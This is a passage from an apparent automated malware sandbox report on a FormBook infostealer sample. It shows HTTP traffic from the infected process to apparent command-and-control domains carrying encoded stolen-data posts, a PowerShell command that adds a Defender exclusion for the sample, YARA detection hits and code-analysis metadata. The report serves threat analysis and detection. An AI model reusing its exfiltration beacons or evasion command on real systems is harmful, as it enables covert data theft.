                                                              Data Ascii: Ux_TPFo=Nii7/1fTzID0/qTHUUGUmP0PJFv8xYdHc53/v4az3tcirXTvqSdS8RSAwx4JD95uZ+0xGkgjtRZYbUUkg5ji9IxQV1jJZfHegcxQ949dMUK7xCa2+5sj7BoWxRSHUdZY4Nw9blXWluKaieMwOha/b+/Ck/kj5oM/Dmsyo7pFgO0yt2p980ir7zQDmyuJH7U9Lz1/Fk5ZLWdNLQc3tnn2WpQdfzCmlU6T6aO80lxa+OBkClpCA37ME2KcemX5KHCQONiXC2RoE+pNECDHyE07/j6++sbKh0W4JETvgLL95PKMK4kj52tGupEmCfzkyOJuBfxn2HhElAfh6BYgJ7tgvIGJ3ya8yNNM43ypMo38ogGigpdUz0hfJrxV+v8DEMiQL732zofnSzZgSM2hHJQdfnDgD6hLFq19Um+2dRu+Pc+8ShhfMnU075tQgqONuo/BPYwJnfPcSJnYS1lIUbtrL96agjdasQYVH9NkpLVMvdIo3oDQ7krUwTdcGhWY7rRoAzoS0BK+ptYReAxGGqlfNHuCJWGd02kVwA9e8VxUXgCJsfYHlQHTEba8aMcGudb/RaJVi0aamLMpDWzjmFuIHYJlU8xO2OXvKOKu/TJcDWcuBTm+4V12yxUhFW8s3fW1yvQY0WCR7e6fE3dcdfoA2Q+Px9/OqJLPDTlQdAUsV+J51vzSPjuCtXKMlefc9cMswCToCmdZGkdhiCN5pSER5f6WjWxbGd4bVoTlOz6Br3c8z279DngLzruDaYgaKQBgPd60gShMP3dQ3MhNb8vRMuIxR5in3K+bPa93h/lUvEzB13J/eHpN3jv2E85KpUDsvlLNv92Y41nX+JqwFe1g/kGQz3+p5t90Nkr0g9B+hHLdQ2Kh1Pont6Gd13wtNYUDFMu6pZqQ9q4srq3JgnHCz79L9USomQCR9bPzSpswUtPFhoTP4v6b0GparjlCcb+Ykqc+P15YpdooY4aZcqJjkETXzLitDtrZFQ6+rVSANXC6 [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              48 | 192.168.2.8 | 49763 | 52.223.13.41 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:19:01.538702965 CEST | 474 | OUT | GET /hvm1/?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng== HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.timetime.store
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:19:02.053178072 CEST | 414 | IN | HTTP/1.1 200 OK
                                                              Server: openresty
                                                              Date: Wed, 25 Sep 2024 07:19:01 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 274
                                                              Connection: close
                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FvypB=88kTDXb8k4dH&Ux_TPFo=AgKb8DW05IXx47rDIxe6k/I3elmL24Z8KJzJt46ewrw8hV7koCZq3nWDxRNTdr9dPMkLNwozkBBgf0Q4+Yfq/718ZCTBXcvSkJlRrZQnUmqO5QjtzKFYlQ011ieRBpIGng=="}</script></head></html>


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              49 | 192.168.2.8 | 49764 | 84.32.84.32 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:19:07.162679911 CEST | 734 | OUT | POST /we8s/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.agilizeimob.app
                                                              Origin: http://www.agilizeimob.app
                                                              Referer: http://www.agilizeimob.app/we8s/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=M9t/nQMPe+Qfb4uCMutlTEXjJWmhK5XP+L51HQ0YxhYq0bOhk6Dnc454P9tPULlCSQO+6LblHSaxKPqyeLf/7/GniPch9Gc5Idy/7Vn4aS2CFww7VvKsPf9O5VXM/PYcyRVGHlsMxDaK29J8H6o5XUp4D4+2uGE8dOP9y+J4Ajsp5SWRMH1Sv2z5r1k/S9SVlGWrOn0=


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              50 | 192.168.2.8 | 49765 | 84.32.84.32 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:19:09.721467018 CEST | 754 | OUT | POST /we8s/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.agilizeimob.app
                                                              Origin: http://www.agilizeimob.app
                                                              Referer: http://www.agilizeimob.app/we8s/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=M9t/nQMPe+QfZb2CApZlVkXgVGmhfJXL+L91HRxFxy8qz6+h2LDnb454HdtKJ7l3SRy26PblHSexKKWyf8r46vGfvvcvj2c5Idy/7VDWaS+CFj47VOKjH/88pFXM7PYYyRUTHkwqxAyK2858GvE6E0p+NY/IhnpJc9Of2t1DMV0R1E77Wl9Us2bSr2MJXKP9/lGbQwjcWGCkyC9aHFhq7Dlj54oX


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              51 | 192.168.2.8 | 49766 | 84.32.84.32 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:19:12.262540102 CEST | 1771 | OUT | POST /we8s/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.agilizeimob.app
                                                              Origin: http://www.agilizeimob.app
                                                              Referer: http://www.agilizeimob.app/we8s/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=M9t/nQMPe+QfZb2CApZlVkXgVGmhfJXL+L91HRxFxy0qzI2hkc3na454GdtLJ7lqSQay6PXqHXCxKouyWuD40vGfmPci9Gd5Ice77VTWaS+CFkI7c/KjF/9O5VXQ/PYwyVxkHlE6ywSK2cp8L986e0p8dI/Ahnlgc9Tu2sBpMSQRxVafFGlv1mDukUMvYarj3EyMaCK+QCatzzB8HHocv2VVrfViawHq/Iw0SNOQd/TTw/Hl9iVoJNmGd1uD2BRtyjRPH/YAY7y4D4QGHDptBCpGGneTfp7jur/NtrPyTJZiXffLxY/p4NuFwWGOxYlbKXZ1/6J3lJE9RVnNYfZbjP8gWqzyCo6uGvPcni+qUCJk969Ha/sV+x2xCtWlUTMNY3j4ybA5P3nrT6+o5GqC8UMpYMT4OUrCLPHAR9C6t+WdnNYVTfcP7IbFkAJjmh0DUD59/6FfrwxqAQZJzVNhnoYzp1OCUj/VLDsTqDS0mMQaRdhavJH6ERget4i5b/chE1pYKk3eBlpuiuiSiC2ElcvFOA8AMAvo3AsKmSY9+4o2Cs7JSH/FBvLcPRoJP4J5dV5tiVShCLxvsOcMS/WxTlEAffX9fV1nERpsOrWZruLzsSmgnbFjGbW3x4oCGzQXECppTWqhrbKLLuecSAyFGFzz5yOiMoqTRDYCZURJ1IsIWmoniQfNVVmi9+MEthrGSzDuMoMp5brvFhwbfoUz6ctLSDVOc/1azOV+kEg+T7ar1gDgON2gi2T5DxXMKAp4LjQu66Fo/mUR+bnEhwnfKWDqs+oAtYmkP+qOn39t20xlohXm90ghltuyWkTcClIcu96OzmE++ec1lLtoqlnAXuer3JBR+dp2d20uHyZyRIc7mAc3GV5wy215mbbXu8VWGZYDeFm/aMsL1qMub13gs2LFHgpmTF8ywnldHNZ7JMQ56PdLQ8NpRu2kvGRSXCYdi2t4YBURqO++cmr6SV+Nk3MDq3EBVbGkmkFKIlOwvXZp [TRUNCATED]


                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                              52 | 192.168.2.8 | 49767 | 84.32.84.32 | 80 | 6192 | C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Timestamp | Bytes transferred | Direction | Data
                                                              Sep 25, 2024 09:19:14.806569099 CEST | 475 | OUT | GET /we8s/?Ux_TPFo=B/Ffkm4qUuUCWdnVEpVwdmrdDijaPZ3A0fpocgttxQoV3YOc442YbZNzMMcWNYt4UT21tvDjHwm/MpeUUta83tC+u6YvkHEIW8iJ6mTYaCCmbzx0dOXTePBC5wD5mbl0jA==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.agilizeimob.app
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:19:15.268935919 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                              Server: hcdn
                                                              Date: Wed, 25 Sep 2024 07:19:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 10072
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 27fa2d6bcda714c86b91b5c30ce88d06-bos-edge1
                                                              Expires: Wed, 25 Sep 2024 07:19:14 GMT
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes
                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.8 | 49768 | 188.114.96.3 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:19:28.994537115 CEST | 716 | OUT | POST /ttiz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.cc101.pro
                                                              Origin: http://www.cc101.pro
                                                              Referer: http://www.cc101.pro/ttiz/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=0HcupG1JsvfGCSoxj0lZlI+RPYGI47vP+nyOSOCF/ZGTsMd3ggpZHScuP+VpqWs6Tr/ZYVwNOjv7Jjvp1zma43VMn562pgRITdoCHrXdPGrc/w9Lcjf3gVoXWUewfSrVtpIdIq75uBBxzaGQHsh+adM8xyxqrYONmg2m7bHzEqCcJYrAgqerNm8dWvHLX/OQ/1UZiRM=


Session ID | Source IP | Source Port | Destination IP | Destination Port
54 | 192.168.2.8 | 49769 | 188.114.96.3 | 80
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 09:19:31.543590069 CEST | 736 | OUT | POST /ttiz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.cc101.pro
                                                              Origin: http://www.cc101.pro
                                                              Referer: http://www.cc101.pro/ttiz/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Ascii: Ux_TPFo=0HcupG1JsvfGCz4xmTRZio+SE4GIxbvL+n+OSPHI8riTrtt3jhpZAScuHeUj3msxTrznYVMNOj77Jifp0Eab4nVOrZ60tgRITdoCHqy6PC/c/DlLfCfo/loWXUewOirRtpJwIoOWuCpxzfiQH5V9QdM68SwAj8Xlsx65wKrSLqSUMuGq6IWtOmU2Wsv9SIT4lWEp8GZNZfKyLREIugXe/w9k3/6t
Sep 25, 2024 09:19:33.575815916 CEST | 694 | IN | HTTP/1.1 405 Not Allowed
                                                              Date: Wed, 25 Sep 2024 07:19:33 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfT6KHekM8E8xQs9eJIhVEpKv9fsPsKyhKG1qUfusyg0%2BWYFCTes0DpVyOe4u4cE%2FdLTEx3KiaCwpmfC2V5uodZuiEvlHHproKHQLdLP4AqIn%2F3CP3JfWIS8UsjIs%2Bjr"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c893f18af8bc47c-EWR
                                                              Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                              Target ID:0
                                                              Start time:03:15:17
                                                              Start date:25/09/2024
                                                              Path:C:\Users\user\Desktop\PO23100072.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0x6f0000
                                                              File size:695'296 bytes
                                                              MD5 hash:B2A43D44C753D573CAEB9160CB1DA4A2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:2
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0xac0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:3
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Users\user\Desktop\PO23100072.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0x90000
                                                              File size:695'296 bytes
                                                              MD5 hash:B2A43D44C753D573CAEB9160CB1DA4A2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:4
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:5
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Users\user\Desktop\PO23100072.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0xd10000
                                                              File size:695'296 bytes
                                                              MD5 hash:B2A43D44C753D573CAEB9160CB1DA4A2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:true

                                                              Target ID:6
                                                              Start time:03:15:21
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0x7ff605670000
                                                              File size:496'640 bytes
                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              Target ID:7
                                                              Start time:03:15:31
                                                              Start date:25/09/2024
                                                              Path:C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe"
                                                              Imagebase:0x120000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:9
                                                              Start time:03:15:33
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\SysWOW64\userinit.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SysWOW64\userinit.exe"
                                                              Imagebase:0xdf0000
                                                              File size:45'568 bytes
                                                              MD5 hash:24892AC6E39679E3BD3B0154DE97C53A
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:false

                                                              Target ID:10
                                                              Start time:03:15:46
                                                              Start date:25/09/2024
                                                              Path:C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe"
                                                              Imagebase:0x120000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              Target ID:14
                                                              Start time:03:16:04
                                                              Start date:25/09/2024
                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                              Imagebase:0x7ff6d20e0000
                                                              File size:676'768 bytes
                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                                Execution Graph

                                                                Execution Coverage:7.1%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:38
                                                                Total number of Limit Nodes:7

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D4F6
                                                                • GetCurrentThread.KERNEL32 ref: 00E7D533
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D570
                                                                • GetCurrentThreadId.KERNEL32 ref: 00E7D5C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: c53d877027a33fdb357b96339ee3a12face185b4b66403c21cdc5e8b46fd3acd
                                                                • Instruction ID: d654a343a4ee3658127cb1c1ed66bea660fe67f839b4a9975b73567069759e89
                                                                • Opcode Fuzzy Hash: c53d877027a33fdb357b96339ee3a12face185b4b66403c21cdc5e8b46fd3acd
                                                                • Instruction Fuzzy Hash: C75156B0904309CFEB14DFA9D948B9EBBF1EF88318F20C459E409A72A0D774A945CF65

                                                                Control-flow Graph

                                                                APIs
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D4F6
                                                                • GetCurrentThread.KERNEL32 ref: 00E7D533
                                                                • GetCurrentProcess.KERNEL32 ref: 00E7D570
                                                                • GetCurrentThreadId.KERNEL32 ref: 00E7D5C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Current$ProcessThread
                                                                • String ID:
                                                                • API String ID: 2063062207-0
                                                                • Opcode ID: 590ba7253790027377a8cc1e80ced47f77eae8b9b199cda1700651d58864848f
                                                                • Instruction ID: 5f9e07f2233b8f33c45a5e571e3ef05d0c851e9fd9bfe114819a6dde7c95c0a6
                                                                • Opcode Fuzzy Hash: 590ba7253790027377a8cc1e80ced47f77eae8b9b199cda1700651d58864848f
                                                                • Instruction Fuzzy Hash: E05136B0900309CFDB14DFAAD948B9EBBF1EF88314F208459E419A7290D775A945CF65

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7B03E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 7c69eeef5180094ce434d1d114ad2cf282e2014d0a67c836d5f34c37677daa10
                                                                • Instruction ID: 31e0d873934ce73215cb1e1a61bb478243f15ee3c2c387c016877c06f2d43707
                                                                • Opcode Fuzzy Hash: 7c69eeef5180094ce434d1d114ad2cf282e2014d0a67c836d5f34c37677daa10
                                                                • Instruction Fuzzy Hash: 137158B0A00B058FE724DF29D44575ABBF1FF88304F04992DE45AE7A50DB35E84ACB91

                                                                Control-flow Graph

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0bbbe38dda44d59963c6568ae938dd1c42e48dde693ee502bb9c437d755049a5
                                                                • Instruction ID: 88eccc2bead256ef57081285afaeda65b83800023263278ad340a9b3cfa6ed03
                                                                • Opcode Fuzzy Hash: 0bbbe38dda44d59963c6568ae938dd1c42e48dde693ee502bb9c437d755049a5
                                                                • Instruction Fuzzy Hash: C931D172804B4ACFEB11DFA8C8857EDBBB0FF85324F24915AC059AB250C7B5A946CB11

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: f8e9f84e3d2da3e69b045f8aeb1cd36d7c7cf43e141ac7a6654fbc58469fb55e
